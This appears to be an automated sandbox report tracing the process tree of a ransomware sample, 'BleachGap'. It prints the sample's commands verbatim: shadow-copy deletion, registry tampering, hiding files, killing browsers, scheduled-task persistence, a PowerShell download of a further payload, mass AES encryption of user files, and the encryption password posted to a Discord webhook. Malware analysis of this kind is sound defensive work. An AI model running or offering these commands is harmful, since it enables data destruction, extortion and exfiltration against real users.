PID 616 wrote to memory of 640	616	cmd.exe	87
PID 616 wrote to memory of 3860	616	cmd.exe	88
PID 616 wrote to memory of 3860	616	cmd.exe	88
PID 616 wrote to memory of 2208	616	cmd.exe	89
PID 616 wrote to memory of 2208	616	cmd.exe	89
PID 616 wrote to memory of 2360	616	cmd.exe	90
PID 616 wrote to memory of 2360	616	cmd.exe	90
PID 616 wrote to memory of 584	616	cmd.exe	91
PID 616 wrote to memory of 584	616	cmd.exe	91
PID 616 wrote to memory of 2488	616	cmd.exe	92
PID 616 wrote to memory of 2488	616	cmd.exe	92
PID 616 wrote to memory of 2488	616	cmd.exe	92
PID 616 wrote to memory of 1372	616	cmd.exe	93
PID 616 wrote to memory of 1372	616	cmd.exe	93
PID 616 wrote to memory of 388	616	cmd.exe	94
PID 616 wrote to memory of 388	616	cmd.exe	94
PID 616 wrote to memory of 3884	616	cmd.exe	95
PID 616 wrote to memory of 3884	616	cmd.exe	95
PID 616 wrote to memory of 2272	616	cmd.exe	96
PID 616 wrote to memory of 2272	616	cmd.exe	96
PID 616 wrote to memory of 2820	616	cmd.exe	97
PID 616 wrote to memory of 2820	616	cmd.exe	97
PID 616 wrote to memory of 252	616	cmd.exe	100
PID 616 wrote to memory of 252	616	cmd.exe	100
PID 616 wrote to memory of 2492	616	cmd.exe	101
PID 616 wrote to memory of 2492	616	cmd.exe	101
PID 616 wrote to memory of 640	616	cmd.exe	103
PID 616 wrote to memory of 640	616	cmd.exe	103
PID 616 wrote to memory of 2348	616	cmd.exe	104
PID 616 wrote to memory of 2348	616	cmd.exe	104
PID 616 wrote to memory of 2348	616	cmd.exe	104
PID 616 wrote to memory of 2704	616	cmd.exe	105
PID 616 wrote to memory of 2704	616	cmd.exe	105
PID 616 wrote to memory of 1748	616	cmd.exe	106
PID 616 wrote to memory of 1748	616	cmd.exe	106
PID 616 wrote to memory of 252	616	cmd.exe	107
PID 616 wrote to memory of 252	616	cmd.exe	107
PID 616 wrote to memory of 252	616	cmd.exe	107
PID 616 wrote to memory of 1136	616	cmd.exe	108
PID 616 wrote to memory of 1136	616	cmd.exe	108
PID 616 wrote to memory of 1136	616	cmd.exe	108
PID 616 wrote to memory of 3876	616	cmd.exe	109
PID 616 wrote to memory of 3876	616	cmd.exe	109
PID 616 wrote to memory of 3876	616	cmd.exe	109
PID 616 wrote to memory of 1456	616	cmd.exe	110
PID 616 wrote to memory of 1456	616	cmd.exe	110
PID 616 wrote to memory of 1456	616	cmd.exe	110
PID 616 wrote to memory of 2136	616	cmd.exe	111
PID 616 wrote to memory of 2136	616	cmd.exe	111

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2208	attrib.exe
2360	attrib.exe
584	attrib.exe
2704	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
"C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1052
- C:\Windows\System32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\42BD.tmp\42BE.bat C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:944
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:1128
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
    3⤵
    PID:3108
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
    3⤵
    PID:2052
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
    3⤵
    PID:516
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    PID:740
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:640
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
    3⤵
    PID:3860
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h +a +i C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
    3⤵
    - Views/modifies file attributes
    PID:2208
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe"
    3⤵
    - Views/modifies file attributes
    PID:2360
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe"
    3⤵
    - Views/modifies file attributes
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start -verb runas cmd.exe /ArgumentList "/c kill.bat" /filepath "C:\Users\Admin\AppData\Local\Temp" /WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:388
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2820
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe" /RU "SYSTEM" /f
    3⤵
    - Creates scheduled task(s)
    PID:252
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
    3⤵
    - Creates scheduled task(s)
    PID:640
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\42AC.tmp\DiscordSendWebhook" -m ":satellite: New Crypt from Admin, Password: Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU, FakeAccount: swHWbEhzjhKISUfERxC9KXLJAr2FTcjA3X, PersonalKey:||Iox5tI9PR14tJFSXpVmVx4JrHUQaBJCKSP50SPLNUjNsOTCU||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2348
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i C:\Users\Admin\AppData\Local\Temp /s /D
    3⤵
    - Views/modifies file attributes
    PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1748
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:252
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "SubmitClose.midi.lck" "SubmitClose.midi"
    3⤵
    - Executes dropped EXE
    PID:1136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddDismount.crw.lck" "AddDismount.crw"
    3⤵
    - Executes dropped EXE
    PID:3876
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExitSend.svgz.lck" "ExitSend.svgz"
    3⤵
    - Executes dropped EXE
    PID:1456
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "OpenJoin.contact.lck" "OpenJoin.contact"
    3⤵
    - Executes dropped EXE
    PID:2136
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ConfirmRegister.mpeg.lck" "ConfirmRegister.mpeg"
    3⤵
    - Executes dropped EXE
    PID:2116
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InitializeEnable.bin.lck" "InitializeEnable.bin"
    3⤵
    - Executes dropped EXE
    PID:3012
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExportSave.pptx.lck" "ExportSave.pptx"
    3⤵
    - Executes dropped EXE
    PID:2552
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AddUse.lnk.lck" "AddUse.lnk"
    3⤵
    - Executes dropped EXE
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "CheckpointExit.mpe.lck" "CheckpointExit.mpe"
    3⤵
    - Executes dropped EXE
    PID:3860
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DebugSend.wdp.lck" "DebugSend.wdp"
    3⤵
    - Executes dropped EXE
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "PopCompress.midi.lck" "PopCompress.midi"
    3⤵
    - Executes dropped EXE
    PID:3660
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "FindSet.ttc.lck" "FindSet.ttc"
    3⤵
    - Executes dropped EXE
    PID:3204
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "UpdateDisable.ps1.lck" "UpdateDisable.ps1"
    3⤵
    - Executes dropped EXE
    PID:2816
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StepGroup.ex_.lck" "StepGroup.ex_"
    3⤵
    - Executes dropped EXE
    PID:2672
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "InvokeInitialize.xht.lck" "InvokeInitialize.xht"
    3⤵
    - Executes dropped EXE
    PID:3768
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RestartReset.3gp.lck" "RestartReset.3gp"
    3⤵
    - Executes dropped EXE
    PID:1340
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ResumeAssert.wma.lck" "ResumeAssert.wma"
    3⤵
    - Executes dropped EXE
    PID:8
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RestoreLimit.nfo.lck" "RestoreLimit.nfo"
    3⤵
    - Executes dropped EXE
    PID:1372
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DisconnectFormat.exe.lck" "DisconnectFormat.exe"
    3⤵
    - Executes dropped EXE
    PID:388
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "BlockTrace.asx.lck" "BlockTrace.asx"
    3⤵
    - Executes dropped EXE
    PID:3884
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "EnterRead.midi.lck" "EnterRead.midi"
    3⤵
    - Executes dropped EXE
    PID:2996
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "MountJoin.WTV.lck" "MountJoin.WTV"
    3⤵
    - Executes dropped EXE
    PID:2276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:184
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:2212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\AppData\Local\Temp\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1980
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\AppData\Local\Temp\p2d.bat
      4⤵
      Modifies registry class
      PID:2284
    - - C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
        5⤵
        Opens file in notepad (likely ransom note)
        
        PID:5668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2696
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:1912
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
    3⤵
    - Executes dropped EXE
    PID:2120
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
    3⤵
    - Executes dropped EXE
    PID:2128
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
    3⤵
    - Executes dropped EXE
    PID:1124
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
    3⤵
    - Executes dropped EXE
    PID:3052
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
    3⤵
    - Executes dropped EXE
    PID:2704
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
    3⤵
    - Executes dropped EXE
    PID:2392
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
    3⤵
    - Executes dropped EXE
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
    3⤵
    - Executes dropped EXE
    PID:3820
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
    3⤵
    - Executes dropped EXE
    PID:1832
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "AssertDebug.xlsm.lck" "AssertDebug.xlsm"
    3⤵
    - Executes dropped EXE
    PID:2504
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "ExpandConfirm.dotx.lck" "ExpandConfirm.dotx"
    3⤵
    - Executes dropped EXE
    PID:2240
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartProtect.wps.lck" "StartProtect.wps"
    3⤵
    - Executes dropped EXE
    PID:3492
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "RenameCompare.mpp.lck" "RenameCompare.mpp"
    3⤵
    - Executes dropped EXE
    PID:260
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "StartInitialize.pub.lck" "StartInitialize.pub"
    3⤵
    - Executes dropped EXE
    PID:1224
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "DenyBackup.vstm.lck" "DenyBackup.vstm"
    3⤵
    - Executes dropped EXE
    PID:500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2300
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:1512
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "desktop.ini.lck.lck" "desktop.ini.lck"
    3⤵
    - Executes dropped EXE
    PID:1932
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck" "These.docx"
    3⤵
    - Executes dropped EXE
    PID:3108
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck" "Are.docx"
    3⤵
    - Executes dropped EXE
    PID:3080
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck" "Recently.docx"
    3⤵
    - Executes dropped EXE
    PID:2132
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck" "Opened.docx"
    3⤵
    - Executes dropped EXE
    PID:3548
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck" "Files.docx"
    3⤵
    - Executes dropped EXE
    PID:2540
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "These.docx.lck.lck" "These.docx.lck"
    3⤵
    - Executes dropped EXE
    PID:3380
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Are.docx.lck.lck" "Are.docx.lck"
    3⤵
    - Executes dropped EXE
    PID:1980
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Recently.docx.lck.lck" "Recently.docx.lck"
    3⤵
    - Executes dropped EXE
    PID:2264
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Files.docx.lck.lck" "Files.docx.lck"
    3⤵
    - Executes dropped EXE
    PID:2008
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "Opened.docx.lck.lck" "Opened.docx.lck"
    3⤵
    - Executes dropped EXE
    PID:2232
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck" "LimitBackup.mpp"
    3⤵
    - Executes dropped EXE
    PID:2192
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "LimitBackup.mpp.lck.lck" "LimitBackup.mpp.lck"
    3⤵
    - Executes dropped EXE
    PID:944
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck" "TraceSave.xlsm"
    3⤵
    - Executes dropped EXE
    PID:1748
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TraceSave.xlsm.lck.lck" "TraceSave.xlsm.lck"
    3⤵
    - Executes dropped EXE
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck" "TestOptimize.ppsx"
    3⤵
    - Executes dropped EXE
    PID:816
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "TestOptimize.ppsx.lck.lck" "TestOptimize.ppsx.lck"
    3⤵
    - Executes dropped EXE
    PID:1896
- - C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\42AC.tmp\aescrypt.exe -e -p Rx8riVNpAOdYacWt4lAqv5222ZA2GVqU -o "NewMeasure.vstx.lck" "NewMeasure.vstx"
    3⤵
    - Executes dropped EXE
